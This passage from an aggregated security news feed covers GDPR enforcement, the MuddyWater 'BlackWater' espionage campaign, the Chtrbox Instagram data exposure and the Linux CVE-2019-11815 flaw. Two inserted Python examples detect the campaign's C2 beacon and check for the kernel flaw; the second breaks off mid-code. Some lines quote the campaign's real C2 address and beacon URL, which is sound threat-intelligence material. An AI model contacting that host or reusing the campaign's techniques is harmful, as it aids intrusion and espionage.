Keep in mind that it is not just about reporting a breach; organisations must also contain the breach, attempt to mitigate its negative effects, evaluate what happened, and prevent a repeat.

Breach reporting myths

Several misconceptions quickly emerged about GDPR, so here is a short primer to clarify them:

  1. Not all data breaches need to be reported to the supervisory authority
  2. Not all details need to be provided as soon as a data breach occurs
  3. Human error can be a source of a data breach
  4. Breach reporting is not all about punishing organisations
  5. Fines are not necessarily automatic or large if you don’t report in time

Resource cost – beyond the obvious

There have been a limited number of GDPR-related fines to date (see below), but this number is likely to increase. Aside from financial penalties relating to breaches, organisations and businesses also need to consider the cost involved in complying with the regulation more generally.

This includes the resources needed to engage with a supervisory authority like the Data Protection Commission, as well as the amount of time it typically takes to manage a subject access request (SAR). The number of SARs is increasing because GDPR allows individuals to make a request free of charge.

GDPR enforcement actions: Google

In the runup to May 25 2018, there had been significant doubts about effective enforcement of the GDPR. If the seemingly invulnerable American social media and technology giants were able to ignore requirements without consequence, what would happen to the credibility and enforceability elsewhere? But against the current global backdrop, those technology companies have become far less invulnerable than they once seemed. Most cases are still making their way through the appeals procedure, but initial verdicts and sanctions are causing ripples for everyone within scope.

On January 21, 2019, the French Supervisory Authority for data protection (CNIL) fined Google €50 million for GDPR violations – the largest data protection fine ever imposed. The case raises several important privacy issues and provides useful insights into how one supervisory authority interprets the GDPR.

CNIL’s decision focuses on two main aspects: (i) violation of Google’s transparency obligations under the GDPR (specifically under Articles 12 and 13) and (ii) the lack of a legal basis for processing personal data (a requirement under Article 6). The CNIL is of the opinion that the consent obtained by Google does not meet the requirements for consent under the GDPR. Google is appealing the decision.

The decision dismisses the application of the GDPR’s one-stop-shop mechanism by holding that Google Ireland Limited is not Google’s main establishment in the EU (which would have made Ireland’s DPC the competent authority, rather than the CNIL). Since the fine is more than €2 million, it is clearly based on the turnover of Alphabet, Google’s holding company in the United States, not on any European entity.

GDPR enforcement actions: Facebook

On 7 February, Germany’s competition law regulator, FCO, concluded a lengthy investigation into Facebook and found that the company abused its dominant market position by making the use of its social network conditional on the collection of user data from multiple sources.

Facebook has not been fined; instead, the FCO imposed restrictions on its processing of user data from private users based in Germany. Facebook-owned services such as WhatsApp and Instagram may continue to collect data but assigning that data to a Facebook user account will only be possible with the user’s voluntary consent. Collecting data from third party websites and assigning it to a Facebook user account will also only be possible with a user’s voluntary consent.

Facebook is required to implement a type of internal unbundling; it can no longer make use of its social network conditional on agreeing to its current data collection and sharing practices relating to its other services or to third party apps and websites. Facebook intends to appeal this landmark decision under both competition and data protection law in the EU.

Other enforcement actions

After Birmingham Magistrates’ Court fined workers in two separate cases for breaching data protection laws, the UK Information Commissioner’s Office warned that employees could face a criminal prosecution if they access or share personal data without a valid reason.

The first hospital GDPR violation penalty was issued in Portugal after the Portuguese supervisory authority audited the hospital and discovered 985 hospital employees had access rights to sensitive patient health information when there were only 296 physicians employed by the hospital. The failure to implement appropriate access controls is a violation of the GDPR, and the hospital was fined €400,000 for the violations.

Lessons from year one

For data controllers and processors, the lessons to be learned from the first year of GDPR are clear:

Transparency is key

You must give users clear, concise, easily accessible information to allow them to understand fully the extent of the processing of their data. Without this information, it is unlikely any consent you collect will be considered valid consent under the GDPR.

Fines can be large

CNIL’s response to Google demonstrates that regulators will get tough when it comes to fines and take several factors into account when determining the level of fine.

Watch the investigations

There are currently 250 ongoing investigations – 200 from complaints or breaches and 50 opened independently by the data protection authorities – so these will be interesting to watch in 2019.

Lead Supervisory Authority identity

Google and Facebook have both appointed the DPC in Ireland as their lead supervisory authority and have included this in the appeals process. CNIL took the lead in the Google investigation, even though Google has its EU headquarters in Ireland, because the complaints were made against Google LLC (the American entity) in France.

Further challenges

Challenges to the way the tech giants use personal data show no sign of dwindling. A complaint has been filed with Austria’s data protection office in respect of a breach of Article 15 GDPR, relating to users of Amazon, Apple, Netflix, Google (again) and Spotify being unable to access their data. 2019 should be an interesting year for privacy.

What lies ahead?

The GDPR cannot be seen in isolation; it emerged at the same time as a growing public movement that frames privacy as a fundamental right. The research company Gartner identified digital ethics and privacy as one of its top trends for 2019. From a legislative perspective, the GDPR is part of a framework aimed at making privacy protection more robust.

PECR is the short form of the Privacy and Electronic Communications (EC Directive) Regulations 2003. They implement the e-privacy directive and they sit alongside the Data Protection Act and the GDPR. They give people specific privacy rights on electronic communications and they contain specific rules on marketing calls, emails, texts and faxes, cookies and similar technologies, keeping communications services secure and customer privacy relating to traffic and location data, itemised billing, line identification, and directory listings.

Further afield in the US, the California Consumer Privacy Act (CCPA) was signed into law in June 2018 and will come into effect on 1 January 2020. It’s intended to give California residents the right to know what personal data is being collected about them, and whether that information is sold or disclosed. Many observers believe the Act will trigger other U.S. states to follow suit.

For the remainder of 2019 and beyond, it promises to be an interesting time for privacy and data protection.

The post GDPR one year on appeared first on BH Consulting.

MuddyWater BlackWater campaign used new anti-detection techniques

A recent MuddyWater campaign tracked as BlackWater shows that the APT group added new anti-detection techniques to its arsenal.

Security experts at Cisco Talos attributed the recently spotted campaign tracked as “BlackWater” to the MuddyWater APT group (aka SeedWorm and TEMP.Zagros). 

The researchers also pointed out that the cyber espionage group has been updating its tactics, techniques, and procedures (TTPs), adding three distinct steps to its operations to avoid detection.

The first MuddyWater campaign was observed in late 2017, when the group targeted entities in the Middle East.

The experts called the campaign ‘MuddyWater’ due to the confusion in attributing a wave of attacks that took place between February and October 2017 targeting entities in Saudi Arabia, Iraq, Israel, United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States.

The group evolved over the years by adding new attack techniques to its arsenal.

In March 2018, experts at FireEye uncovered a massive phishing campaign conducted by the TEMP.Zagros group targeting Asia and Middle East regions from January 2018 to March 2018.

Attackers used weaponized documents typically having geopolitical themes, such as documents purporting to be from the National Assembly of Pakistan or the Institute for Development and Research in Banking Technology.

In June 2018, Trend Micro researchers discovered a new attack relying on weaponized Word documents and PowerShell scripts that appeared related to MuddyWater. The final payload delivered in that campaign was the PRB-Backdoor RAT, controlled through a command and control (C&C) server at outl00k[.]net.

This campaign aims at installing a PowerShell-based backdoor onto the victim’s machine for espionage purposes.

MuddyWater document

As part of the recent BlackWater campaign, the MuddyWater APT group leveraged an obfuscated Visual Basic for Applications (VBA) macro to add a Run registry key and gain persistence.

The attackers then used a PowerShell stager script, masquerading as a red-teaming tool, that would download a PowerShell-based Trojan from a C2 server.

The stager downloads from the C2 a component of the FruityC2 agent script, an open-source framework hosted on GitHub, which is used to enumerate the host machine.

“This could allow the threat actor to monitor web logs and determine whether someone uninvolved in the campaign made a request to their server in an attempt to investigate the activity.” reads the analysis published by Talos group. “Once the enumeration commands would run, the agent would communicate with a different C2 and send back the data in the URL field. This would make host-based detection more difficult, as an easily identifiable “errors.txt” file would not be generated.”

The group also replaced some variable strings in more recent samples to evade signature-based detection by YARA rules.

The attackers used a document that, once opened, prompted the user to enable a macro titled “BlackWater.bas”. They password-protected the macro to prevent the user from viewing it in the Visual Basic editor. The “BlackWater.bas” macro was obfuscated with a substitution cipher in which each character is replaced by its corresponding integer code.

“This series of commands first sent a server hello message to the C2, followed by a subsequent hello message every 300 seconds. An example of this beacon is “hxxp://82[.]102[.]8[.]101:80/bcerrxy.php?rCecms=BlackWater”.” continues the analysis. “Notably, the trojanized document’s macro was also called “BlackWater,” and the value “BlackWater” was hard coded into the PowerShell script. Next, the script would enumerate the victim’s machine”
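The beacon described in the quoted passage is detectable from proxy logs on two traits at once: a fixed 300-second cadence and a constant query value. The following is an added example, not code from the Talos report or from the original post; it groups requests per client, host and path, flags groups whose inter-request gaps all sit near the expected period, and optionally requires the hard-coded marker. The log layout (one "timestamp client method url" record per line), the 25-second jitter tolerance and the sample log itself are assumptions and constructed data, not captured traffic.

```python
"""Flag fixed-interval HTTP beacons carrying a hard-coded query value in proxy logs.

Added example, not code from the Talos report or the original post. It models
the behaviour described in the text: an agent that sends a "hello" to its C2
every 300 seconds as a GET whose query string carries a constant marker
(bcerrxy.php?rCecms=BlackWater). The log layout ("timestamp client method url"
per line) and the 25-second jitter tolerance are assumptions; SAMPLE_LOG is a
constructed sample, not captured traffic.
"""
import re
from collections import defaultdict
from statistics import median
from urllib.parse import parse_qs, urlsplit

LOG_LINE = re.compile(
    r"^(?P<ts>\d+(?:\.\d+)?)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)$"
)


def parse_log(text):
    """Yield (timestamp, client, host, path, query) tuples; unparseable lines are skipped."""
    for raw in text.splitlines():
        m = LOG_LINE.match(raw.strip())
        if not m:
            continue
        url = urlsplit(m["url"])
        yield float(m["ts"]), m["client"], url.netloc, url.path, parse_qs(url.query)


def find_beacons(text, period=300.0, tolerance=25.0, min_hits=3, marker=None):
    """Group requests by (client, host, path); report groups whose every gap is near `period`.

    `marker` is an optional (param, value) pair. When given, only requests whose
    query carries exactly that value are considered; that is how the hard-coded
    "BlackWater" value separates the agent from benign periodic traffic (OCSP,
    update checks) that would otherwise match on timing alone.
    """
    groups = defaultdict(list)
    for ts, client, host, path, query in parse_log(text):
        if marker is not None:
            param, value = marker
            if query.get(param) != [value]:
                continue
        groups[(client, host, path)].append(ts)

    hits = []
    for (client, host, path), stamps in groups.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [later - earlier for earlier, later in zip(stamps, stamps[1:])]
        if all(abs(gap - period) <= tolerance for gap in gaps):
            hits.append({"client": client, "host": host, "path": path,
                         "count": len(stamps), "median_gap": median(gaps)})
    return hits


# Constructed sample: one host beaconing to the C2 address from the report every
# ~300 s, the same host's legitimate OCSP checks (also periodic), an irregular
# update check, a second host using the same path with a different marker, and
# one junk line that the parser must skip.
SAMPLE_LOG = """\
1000.000 10.0.0.5 GET http://82.102.8.101:80/bcerrxy.php?rCecms=BlackWater
1000.120 10.0.0.5 GET http://ocsp.example.com/
1010.500 10.0.0.5 GET http://updates.example.com/check
1000.300 10.0.0.9 GET http://82.102.8.101:80/bcerrxy.php?rCecms=foo
1100.000 10.0.0.9 GET http://82.102.8.101:80/bcerrxy.php?rCecms=foo
1300.000 10.0.0.5 GET http://82.102.8.101:80/bcerrxy.php?rCecms=BlackWater
1300.100 10.0.0.5 GET http://ocsp.example.com/
1500.000 10.0.0.5 GET http://updates.example.com/check
1601.000 10.0.0.5 GET http://82.102.8.101:80/bcerrxy.php?rCecms=BlackWater
1600.100 10.0.0.5 GET http://ocsp.example.com/
1899.000 10.0.0.5 GET http://82.102.8.101:80/bcerrxy.php?rCecms=BlackWater
1900.100 10.0.0.5 GET http://ocsp.example.com/
1900.000 10.0.0.9 GET http://82.102.8.101:80/bcerrxy.php?rCecms=foo
2200.000 10.0.0.5 GET http://82.102.8.101:80/bcerrxy.php?rCecms=BlackWater
this line is not a log record and is skipped
"""

if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG, marker=("rCecms", "BlackWater")):
        print(hit)
```

Run without the marker and the OCSP traffic is flagged too, which is the usual false-positive problem with timing-only beacon detection; the constant value the operators hard-coded is what makes the rule precise, and it is exactly the kind of string a minor variable rename in the next sample would break, as the article notes.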

Experts conclude that even if the changes implemented by the threat actor were minimal, they were significant enough to avoid detection and to allow the group to continue to perform operations.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – MuddyWater, APT)

The post MuddyWater BlackWater campaign used new anti-detection techniques appeared first on Security Affairs.

Five ways automating IAM saves you money

Identity is the foundation of security, so a robust automated identity and access management (IAM) system is by far the best way to keep your company’s information safe. It’s also a great way to increase efficiency and save money. It’s no wonder so many businesses are adopting IAM systems. The global market value of identity and access management systems has grown from $4.5 billion in 2012 to $7.1 billion in 2018. By 2021, it is … More

The post Five ways automating IAM saves you money appeared first on Help Net Security.

US Commerce Department delays Huawei ban for 90 Days

The US Commerce Department will wait 90 days before applying the announced Huawei ban, to avoid a massive disruption of existing operations.

Over the weekend, Reuters exclusively revealed that Alphabet Inc’s Google had suspended some business with Huawei after the Trump administration’s ban on the telco giant.

On Thursday, President Trump added Huawei Technologies to a trade blacklist, but on Friday the U.S. Commerce Department said it was considering easing the restrictions on the company to “prevent the interruption of existing network operations and equipment”.

Now a Commerce Department filing confirms that the delay does not change the ban, but grants a 90-day temporary license that allows Huawei to continue doing business with American companies.

The Temporary General License aims at preventing disruption to the operations of the company that could have a dramatic impact on mobile users and broadband network operators.

“The Temporary General License grants operators time to make other arrangements and (gives) the Department space to determine the appropriate long term measures for Americans and foreign telecommunications providers that currently rely on Huawei equipment for critical services,” said Secretary of Commerce Wilbur Ross.

“In short, this license will allow operations to continue for existing Huawei mobile phone users and rural broadband networks.”

Huawei ban

While the tech giant is at the center of a heated debate, Five Eyes intelligence agencies believe Huawei equipment for 5G infrastructure poses a “significant network security risk”; for this reason, they have asked mobile companies to avoid using the Chinese company’s equipment.

The Chinese company was founded in 1987 by a former People’s Liberation Army officer. The US was the first country to warn of the security risks associated with the use of products manufactured by the Chinese telecommunications giant.

US intelligence believes Huawei equipment is tainted with backdoors that could allow Chinese intelligence to spy on the communications networks of rival countries.

In November, The Wall Street Journal reported that the US Government is urging its allies to exclude Huawei from critical infrastructure and 5G architectures.

The United States highlighted the risks for national security in case of adoption of Huawei equipment and is inviting internet providers and telco operators in allied countries to ban Huawei.

Chinese equipment is broadly adopted in many allied countries, including Germany, Italy and Japan. Many countries are about to build 5G infrastructure, but their governments’ approaches differ considerably.

Now the US Commerce Department has delayed the ban for 90 days. Experts believe that Huawei is only the first of several Chinese companies that will face similar measures because they could threaten the economic and technological leadership of the United States.


Pierluigi Paganini

(SecurityAffairs – Huawei ban, China)

The post US Commerce Department delays Huawei ban for 90 Days appeared first on Security Affairs.

Traditional approach to data security hindering digital transformation initiatives

Security professionals who adopted a more traditional or reactive approach to their data protection and security program did not believe they would reach their digital transformation goals, according to a TITUS report. The report, “The Vital Role of Security in Digital Transformation,” is based on a survey conducted by Market Strategies International of more than 600 IT decision makers at leading brands across a diverse set of industries in the United States, Canada and the … More

The post Traditional approach to data security hindering digital transformation initiatives appeared first on Help Net Security.

Instagram Influencer’s Account Information Exposed

The life of Instagram influencers is public by design; now an exposed database appears to have added to what is known about them.

According to a TechCrunch report, account details of 49 million Instagram users, including influencers and brand accounts, were exposed online. The database contains public data that appears to have been scraped from Instagram profiles, alongside personal data such as telephone numbers and e-mail addresses.

According to the report, the database belongs to Chtrbox, an Indian marketing company that connects influencers with brands that want to promote their products. Chtrbox has not yet responded.

“We’re looking into the issue to understand if the data described — including email and phone numbers — was from Instagram or from other sources,” an Instagram spokeswoman said in a statement. “We’re also inquiring with Chtrbox to understand where this data came from and how it became publicly available.”

Instagram’s terms of service prohibit scraping. Chtrbox’s website claims more than 184,000 Instagram influencers as customers, far fewer than the millions of records reportedly found in the database.

This is not the first time that high-profile Instagram users’ information has been exposed. In 2017, hackers exploited a bug in the photo-sharing app to obtain the phone numbers and contact information of celebrities.

According to TechCrunch, independent security researcher Anurag Sen found the data; the database has since been taken offline. Under-protected cloud databases are a growing problem as more and more companies place sensitive data on cloud servers without the necessary data security expertise. Researchers around the world hunt for exposed databases and try to get their owners to secure them; one example is a cache of demographic data on 80 million American households that was taken down in April.

Celebrity Instagram users might be at risk if hackers got their hands on their private email addresses, said Mark Risher, head of account security at Google. He recommended Gmail users check their security settings through the Google Security Checkup and also set up extra login protections, including prompts and the Advanced Protection Program.

“Given the high-profile nature of some of these accounts, attackers may try to break into the email accounts as a means to impersonate the legitimate account holder,” Risher said.

The post Instagram Influencer’s Account Information Exposed appeared first on .

SD-WAN adoption growing as enterprises embrace app-centric architecture transition

The connected era and cloud-based environment have created a need to redesign network operations, according to ResearchAndMarkets. In addition, businesses find it operationally draining to utilize resources on ensuring a connected ecosystem rather than focusing on critical business issues. Software-defined Wide Area Network (SD-WAN) helps enterprises build an agile and automated environment, which is streamlined to support new-age cloud environments and traditional Multiprotocol Label Switching (MPLS) systems in a cost-efficient manner. To understand enterprise perceptions … More

The post SD-WAN adoption growing as enterprises embrace app-centric architecture transition appeared first on Help Net Security.

Engineering teams are struggling because they’re missing the right automation

Driven by the trend of microservices creating complexity in code delivery and every company becoming a technology company, the software development community is under enormous pressure to deliver high-quality, leading-edge, and scalable code to an insatiable market. Data from a new survey by Codefresh exposes the relentless pressure, with 32 percent reporting they were not using any CI/CD tools at all, and about 60 percent agreeing that their organizations are “not using the right amount … More

The post Engineering teams are struggling because they’re missing the right automation appeared first on Help Net Security.

Women and Nonbinary People in Information Security: Yaz

Last time, I spoke with technology marketing communicator Stacey Holleran. Our work is similar but different. Plus, she warned me about what I might expect from the tech industry in a few years when I turn 40! For my last interview until fall/autumn, I had the pleasure of speaking with Yaz. She went from the […]… Read More

The post Women and Nonbinary People in Information Security: Yaz appeared first on The State of Security.

Letting Go While Holding On: Managing Cyber Risk in Cloud Environments

As recently as 2017, security and compliance professionals at many of Tripwire’s large enterprise and government customers were talking about migration to the cloud as a possibility to be considered and cautiously explored in the coming years. Within a year, the tone had changed. What used to be “we’re thinking about it” became “the CIO […]… Read More

The post Letting Go While Holding On: Managing Cyber Risk in Cloud Environments appeared first on The State of Security.

ThreatQ adds support for mobile and PRE-ATT&CK in response to rapid customer adoption

ThreatQuotient, a leading security operations platform innovator, announced that the ThreatQ integration with MITRE ATT&CK now includes support for PRE-ATT&CK and Mobile. Together with Enterprise ATT&CK, the three-pronged framework creates an end-to-end attack chain that examines and assesses an adversaries’ actions. Since first integrating with MITRE ATT&CK in early 2018, ThreatQuotient has helped customers integrate the framework in their workflows to achieve a holistic view of their organization’s specific attack vectors and what needs to … More

The post ThreatQ adds support for mobile and PRE-ATT&CK in response to rapid customer adoption appeared first on Help Net Security.

Exabeam enhances security management approach and boosts cybersecurity degree program

Exabeam, the Smarter SIEM company, announced a partnership with Deakin University in Australia to strengthen its security management approach and bolster its already distinguished cybersecurity degree program, delivered through the School of IT. The university not only deployed Exabeam Advanced Analytics to help process the large amounts of generated data and spot anomalies on its network; it also turned to the security management leader’s industry expertise to build out its curriculum and initiate a real-life … More

The post Exabeam enhances security management approach and boosts cybersecurity degree program appeared first on Help Net Security.

Catchpoint’s new monitoring platform offers continuous visibility into all network dependencies

Catchpoint, the digital experience monitoring (DEM) leader, introduced Internet Intelligence, a new monitoring capability providing organizations with deeper visibility into the health and pathways of the external and internal networks upon which their applications or digital services depend. Internet Intelligence shows a network’s impact on the end user experience by continuously monitoring network health and network paths to private, public or hybrid clouds, CDNs, and other distributed IT architecture. This far-reaching visibility isolates degradations across … More

The post Catchpoint’s new monitoring platform offers continuous visibility into all network dependencies appeared first on Help Net Security.

Tata Communications and Cisco to enable enterprises a multi-cloud native hybrid network transformation

The leading global digital infrastructure provider Tata Communications and Cisco have extended their partnership to enable enterprises to transform their legacy network to a customised and secure multi-cloud native hybrid network. The combination of Tata Communications’ IZO cloud enablement platform and Cisco SD-WAN is a fully-managed, global solution that gives businesses greater control over their digital infrastructure, the ability to securely connect any user to any application location, and provide the assurance of application performance … More

The post Tata Communications and Cisco to enable enterprises a multi-cloud native hybrid network transformation appeared first on Help Net Security.

BC in the Cloud rebrands as Infinite Blue and expands its enterprise application business

BC in the Cloud announced its new name, Infinite Blue, and its acquisition of Rollbase, a low-code development platform that helps customers to deliver agile, adaptable business applications quickly, increasing speed to market. Infinite Blue’s new offering — Infinite Blue Platform — will combine a low-code development platform with a flexible deployment architecture to make it easier than ever to build, deploy and manage business applications. The company will use Infinite Blue Platform to power … More

The post BC in the Cloud rebrands as Infinite Blue and expands its enterprise application business appeared first on Help Net Security.

Mellanox launches Ethernet Cloud Fabric technology based on Spectrum-2

Mellanox Technologies, a leading supplier of high-performance, end-to-end smart interconnect solutions for data center servers and storage systems, introduced breakthrough Ethernet Cloud Fabric (ECF) technology based on Spectrum-2, the world’s most advanced 100/200/400 Gb/s Ethernet switches. ECF technology provides the ideal platform to quickly build and simply deploy state of the art public and private cloud data centers with improved efficiency and manageability. ECF combines three critical capabilities: Industry-leading packet forwarding data plane Agile, flexible … More

The post Mellanox launches Ethernet Cloud Fabric technology based on Spectrum-2 appeared first on Help Net Security.

Syncsort launches Syncsort Invent initiative to help orgs anticipate and embrace Next Wave technologies

Syncsort, the global leader in Big Iron to Big Data software, announced the launch of Syncsort Invent, an initiative focused on helping enterprises anticipate and embrace the Next Wave – an era that defines the new technologies and applications that are making existing data more useful. Syncsort Invent advances data by helping enterprises connect decades of data infrastructure investment with Next Wave technologies such as cloud and blockchain. “We believe that data makes the difference. … More

The post Syncsort launches Syncsort Invent initiative to help orgs anticipate and embrace Next Wave technologies appeared first on Help Net Security.

Syncurity IR-Flow SOAR platform now in the Oracle Cloud Marketplace

Syncurity, a market leader in Security Orchestration, Automation and Response (SOAR), and a Silver level member of Oracle PartnerNetwork (OPN), announced that its award-winning and patent-pending IR-Flow SOAR platform has achieved Powered by Oracle Cloud status and is now available in the Oracle Cloud Marketplace, offering added value to Oracle Cloud customers. The IR-Flow SOAR platform, Syncurity IR-Flow, enables a “process-first” approach to streamlining the entire incident management process — from proactive threat hunting and … More

The post Syncurity IR-Flow SOAR platform now in the Oracle Cloud Marketplace appeared first on Help Net Security.

Data belonging to Instagram influencers and celebrities exposed online

A new data leak made the headlines, a database containing the contact information of millions of Instagram influencers, celebrities and brand accounts has been found online.

The news was first reported by TechCrunch: the database was left unprotected on Amazon Web Services, and anyone could access it without authentication.


The unprotected database was discovered by security researcher Anurag Sen, who immediately reported his discovery to TechCrunch in an effort to find the owner.

“A massive database containing contact information of millions of Instagram influencers, celebrities and brand accounts has been found online.” states TechCrunch.

“At the time of writing, the database had over 49 million records — but was growing by the hour.”

The database contained public data scraped from influencer Instagram accounts, including their bio, profile picture, number of followers, whether they are verified, and their location by city and country, together with private contact information: the email address and phone number of the account owner.

Each record in the database also contained a field that calculated the worth of each account.

The list of influencers in the archive includes prominent food bloggers, celebrities and other social media influencers.

According to TechCrunch, the database belongs to India-based social media marketing firm Chtrbox, which pays influencers to post sponsored content on their accounts.

Strangely, two people contacted by TechCrunch who confirmed the authenticity of the data in the archive denied any involvement with Chtrbox.

“We contacted several people at random whose information was found in the database and provided them their phone numbers. Two of the people responded and confirmed their email address and phone number found in the database was used to set up their Instagram accounts.” continues the website. “Neither had any involvement with Chtrbox, they said.”

TechCrunch contacted Chtrbox, which then secured the database, but it is not clear how the company obtained the data.

Facebook, which owns Instagram, announced it is investigating the incident.

“We’re looking into the issue to understand if the data described – including email and phone numbers – was from Instagram or from other sources,” reads a statement from Facebook. “We’re also inquiring with Chtrbox to understand where this data came from and how it became publicly available,”

In 2017, a vulnerability in the Instagram application allowed hackers to access information on high-profile users, including the phone numbers and email addresses of 6 million celebrities.


Pierluigi Paganini

(SecurityAffairs – Instagram, data leak)

The post Data belonging to Instagram influencers and celebrities exposed online appeared first on Security Affairs.

Lattice Semiconductor enhances its Lattice sensAI solutions stack

Lattice Semiconductor Corporation, the low power programmable leader, announced major performance and design flow enhancements for its award-winning Lattice sensAI solutions stack. The Lattice sensAI stack provides a comprehensive hardware and software solution for implementing low power (1mW-1W), always-on artificial intelligence (AI) functionality in smart devices operating at the Edge. IHS forecasts 40 billion devices will be operating at the network Edge by 2025. For reasons including latency, network bandwidth limitations, and data privacy, OEMs … More

The post Lattice Semiconductor enhances its Lattice sensAI solutions stack appeared first on Help Net Security.

Privacy Intelligence News & Insights: New Jersey and Washington Amend State Data Breach Notification Laws

On May 10, New Jersey Bill S-52 was signed into law, which amends the state’s data breach notification law to expand the definition of personal information. Under the amended law, effective September 1, 2019, “personal information” that requires a company to notify individuals if breached now includes a “user name, email address, or any other account holder identifying information, in combination with any password or security questions and answer.” In Washington, the state legislature passed an amendment to the existing data breach notification law that expands the list of data elements that require notification to individuals if breached in combination with an … Continue reading Privacy Intelligence News & Insights: New Jersey and Washington Amend State Data Breach Notification Laws

The post Privacy Intelligence News & Insights: New Jersey and Washington Amend State Data Breach Notification Laws appeared first on TrustArc Blog.

The Concept of "Return on Data"

This law review article by Noam Kolt, titled "Return on Data," proposes an interesting new way of thinking of privacy law.

Abstract: Consumers routinely supply personal data to technology companies in exchange for services. Yet, the relationship between the utility (U) consumers gain and the data (D) they supply -- "return on data" (ROD) -- remains largely unexplored. Expressed as a ratio, ROD = U / D. While lawmakers strongly advocate protecting consumer privacy, they tend to overlook ROD. Are the benefits of the services enjoyed by consumers, such as social networking and predictive search, commensurate with the value of the data extracted from them? How can consumers compare competing data-for-services deals? Currently, the legal frameworks regulating these transactions, including privacy law, aim primarily to protect personal data. They treat data protection as a standalone issue, distinct from the benefits which consumers receive. This article suggests that privacy concerns should not be viewed in isolation, but as part of ROD. Just as companies can quantify return on investment (ROI) to optimize investment decisions, consumers should be able to assess ROD in order to better spend and invest personal data. Making data-for-services transactions more transparent will enable consumers to evaluate the merits of these deals, negotiate their terms and make more informed decisions. Pivoting from the privacy paradigm to ROD will both incentivize data-driven service providers to offer consumers higher ROD, as well as create opportunities for new market entrants.

Linux kernel privilege escalation flaw CVE-2019-11815 affects RDS

Experts discovered a privilege escalation vulnerability in the Linux Kernel, tracked as CVE-2019-11815, that affects the implementation of RDS over TCP.

Experts discovered a memory corruption vulnerability in the Linux kernel that resides in the implementation of Reliable Datagram Sockets (RDS) over TCP.

The vulnerability, tracked as CVE-2019-11815, could lead to privilege escalation and received a CVSS base score of 8.1. It only affects Linux kernels prior to 5.0.8 on which the RDS over TCP module (rds_tcp) is loaded.

“An issue was discovered in rds_tcp_kill_sock in net/rds/tcp.c in the Linux kernel before 5.0.8. There is a race condition leading to a use-after-free, related to net namespace cleanup.” reads the NVD entry published by NIST.

NIST classifies the flaw as a race condition in the kernel’s rds_tcp_kill_sock() function in net/rds/tcp.c, leading to a use-after-free during network namespace cleanup.

The 8.1 score follows from the CVSS vector NIST assigned (network attack vector with high attack complexity, no privileges and no user interaction required), although, as the Canonical note quoted further down makes clear, whether the bug is actually exploitable remotely is disputed.

An attacker who triggers the use-after-free could read restricted kernel memory or crash the system, causing a denial of service.

“A system that has the rds_tcp kernel module loaded (either through autoload via local process running listen(), or manual loading) could possibly cause a use after free (UAF) in which an attacker who is able to manipulate socket state while a network namespace is being torn down,” reads the advisory published by Red Hat.

According to a note included in the security advisory published by Canonical, there is no evidence that the bug is remotely exploitable. 

“I haven’t yet seen evidence to support allegations that this is remotely exploitable. Blacklisting rds.ko module is probably sufficient to prevent the vulnerable code from loading.” said Seth Arnold from the Ubuntu’s security team. “The default configuration of the kmod package has included RDS in /etc/modprobe.d/blacklist-rare-network.conf since 14.04 LTS. I’m dropping priority as a result.”

Both SUSE and Debian also published security advisories for the CVE-2019-11815 vulnerability.
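The practical question for a defender is not the kernel version alone but whether rds_tcp is loaded or can be autoloaded, and whether the modprobe blacklist the Ubuntu note relies on is actually in place. The following is an added example, not code from the original post or from any vendor advisory; it parses /proc/modules, /etc/modprobe.d and the kernel release string and combines them into a verdict. The sample file contents are constructed, the 5.0.8 cutoff is the upstream fix version named in the advisory (distribution kernels that backport the fix will report older versions, so treat the version check as a hint, not proof), and the `install rds /bin/false` directive is the standard modprobe.d mechanism for refusing a module outright, mentioned here as the stronger alternative to a bare `blacklist` line.

```python
"""Check whether a host is exposed to CVE-2019-11815 via the rds/rds_tcp modules.

Added example, not from the original post or any vendor advisory. It encodes
the mitigation discussed in the text: the bug is in rds_tcp, so a host only
matters if that module is loaded or can be autoloaded. The functions take file
contents as text so they can be run against captured files or the constructed
samples below; read_host() wires them to the live files on a Linux system.
"""
import glob
import re
from pathlib import Path

RDS_MODULES = ("rds", "rds_tcp")
FIXED_VERSION = (5, 0, 8)  # upstream fix per the advisory; distro backports may patch older versions


def loaded_rds_modules(proc_modules_text):
    """Return the set of RDS modules present in /proc/modules text."""
    loaded = set()
    for line in proc_modules_text.splitlines():
        fields = line.split()
        if fields and fields[0] in RDS_MODULES:
            loaded.add(fields[0])
    return loaded


def modprobe_policy(conf_text):
    """Parse modprobe.d directives that stop rds/rds_tcp from loading.

    'blacklist rds' only stops alias-based autoload, which is what the Ubuntu
    note calls "probably sufficient"; 'install rds /bin/false' also defeats an
    explicit modprobe, so it is the stronger setting.
    Returns {module: {"blacklist": bool, "install_blocked": bool}}.
    """
    policy = {m: {"blacklist": False, "install_blocked": False} for m in RDS_MODULES}
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = re.match(r"^(blacklist|install)\s+(\S+)(?:\s+(.*))?$", line)
        if not m or m.group(2) not in RDS_MODULES:
            continue
        directive, module, rest = m.groups()
        if directive == "blacklist":
            policy[module]["blacklist"] = True
        elif rest and rest.strip() in ("/bin/false", "/bin/true"):
            policy[module]["install_blocked"] = True
    return policy


def parse_kernel_version(release):
    """'5.0.7-generic' -> (5, 0, 7); a missing patch level counts as 0."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError(f"unparseable kernel release: {release!r}")
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)


def assess(release, proc_modules_text, modprobe_text):
    """Combine kernel version, loaded modules and modprobe policy into a verdict."""
    loaded = loaded_rds_modules(proc_modules_text)
    policy = modprobe_policy(modprobe_text)
    kernel_vulnerable = parse_kernel_version(release) < FIXED_VERSION
    # The vulnerable code is in rds_tcp, which sits on top of rds; blocking rds
    # is the setting the quoted Ubuntu note relies on.
    rds_blocked = policy["rds"]["blacklist"] or policy["rds"]["install_blocked"]
    if loaded and kernel_vulnerable:
        verdict = "exposed"
    elif loaded:
        verdict = "patched (module loaded)"
    elif kernel_vulnerable and rds_blocked:
        verdict = "mitigated"
    elif kernel_vulnerable:
        verdict = "exposed if rds loads"
    else:
        verdict = "patched"
    return {"kernel_vulnerable": kernel_vulnerable, "rds_loaded": sorted(loaded),
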